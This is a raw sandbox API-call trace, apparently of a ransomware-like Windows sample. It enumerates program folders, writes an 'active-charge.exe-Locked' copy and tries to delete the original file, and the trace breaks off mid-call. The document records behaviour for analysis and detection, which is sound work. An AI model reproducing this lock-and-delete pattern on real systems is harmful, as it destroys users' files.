ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb8017995, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb8017995, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb8017995, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb8017995, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1c9d90, ftCreationTime.dwHighDateTime=0x1d7d4d9, ftLastAccessTime.dwLowDateTime=0x584d6b30, ftLastAccessTime.dwHighDateTime=0x1d7e370, ftLastWriteTime.dwLowDateTime=0x584d6b30, ftLastWriteTime.dwHighDateTime=0x1d7e370, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-charge.exe", cAlternateFileName="ACTIVE~1.EXE")) returned 1 [0299.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x55499555, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55499555, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55499555, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0299.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0299.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1dbc800, ftCreationTime.dwHighDateTime=0x1d770a5, ftLastAccessTime.dwLowDateTime=0xb9f5fd00, ftLastAccessTime.dwHighDateTime=0x1d7df76, ftLastWriteTime.dwLowDateTime=0xb9f5fd00, ftLastWriteTime.dwHighDateTime=0x1d7df76, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oh pain.exe", cAlternateFileName="OHPAIN~1.EXE")) returned 1 [0299.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0299.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0299.006] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.006] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.006] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked", lpFilePart=0x0) returned 0x3c [0299.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.006] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked" (normalized: "c:\\program files (x86)\\common files\\active-charge.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.007] GetFileType (hFile=0x498) returned 0x1 [0299.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.007] GetFileType (hFile=0x498) returned 0x1 [0299.010] CloseHandle (hObject=0x498) returned 1 [0299.010] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\active-charge.exe", lpFilePart=0x0) returned 0x35 [0299.011] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe" (normalized: "c:\\program files (x86)\\common files\\active-charge.exe")) returned 0 [0299.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.014] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", lpFilePart=0x0) returned 0x34 [0299.014] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\", lpFilePart=0x0) returned 0x35 [0299.014] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.014] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.017] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918afe0b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x918afe0b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x91b3843c, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access 2016.lnk", cAlternateFileName="ACCESS~1.LNK")) returned 1 [0299.017] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36990d0, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36990d0, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0299.017] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~2")) returned 1 [0299.017] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0299.018] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3672e79, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97362eb5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee2becc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0299.018] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x23bf23db, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x23bf23db, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x23bf23db, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x355, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0299.018] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x503ebe79, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x503ebe79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x503ebe79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x895, dwReserved0=0x0, dwReserved1=0x0, cFileName="Devices Flow.lnk", cAlternateFileName="")) returned 1 [0299.019] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c425ce, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x91c425ce, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x91c73351, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel 2016.lnk", cAlternateFileName="EXCEL2~1.LNK")) returned 1 [0299.019] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x503ebe79, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x503ebe79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x503ebe79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x92d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Immersive Control Panel.lnk", cAlternateFileName="")) returned 1 [0299.019] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0299.019] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91cbc61e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9833cf8e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 2016 Tools", cAlternateFileName="MICROS~1")) returned 1 [0299.019] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x1a440bee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a440bee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a440bee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MiracastView.lnk", cAlternateFileName="")) returned 1 [0299.020] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9856516c, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9856516c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98566539, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive for Business.lnk", cAlternateFileName="ONEDRI~1.LNK")) returned 1 [0299.020] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9875e8e4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9875e8e4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9875faea, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x989, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNote 2016.lnk", cAlternateFileName="ONENOT~1.LNK")) returned 1 [0299.020] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9887255b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9887255b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x988738f2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x997, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook 2016.lnk", cAlternateFileName="OUTLOO~1.LNK")) returned 1 [0299.021] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989fca23, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x989fca23, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x989fde6b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint 2016.lnk", cAlternateFileName="POWERP~1.LNK")) returned 1 [0299.021] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x502baba5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x502baba5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x502baba5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x897, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintDialog.lnk", cAlternateFileName="")) returned 1 [0299.021] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98bdb45f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98bdb45f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98bdc5e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x991, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher 2016.lnk", cAlternateFileName="PUBLIS~1.LNK")) returned 1 [0299.021] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x2007da5a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2007da5a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2007da5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.lnk", cAlternateFileName="")) returned 1 [0299.021] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98d3e739, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98d3e739, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98d3faa2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype for Business 2016.lnk", cAlternateFileName="SKYPEF~1.LNK")) returned 1 [0299.022] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartUp", cAlternateFileName="")) returned 1 [0299.022] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x370b7e7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x370b7e7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0299.022] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tablet PC", cAlternateFileName="TABLET~1")) returned 1 [0299.023] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98de5a53, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 1 [0299.023] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.023] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.024] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", lpFilePart=0x0) returned 0x34 [0299.024] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\", lpFilePart=0x0) returned 0x35 [0299.024] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.024] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.025] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918afe0b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x918afe0b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x91b3843c, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access 2016.lnk", cAlternateFileName="ACCESS~1.LNK")) returned 1 [0299.025] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36990d0, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36990d0, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0299.025] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~2")) returned 1 [0299.026] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0299.026] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 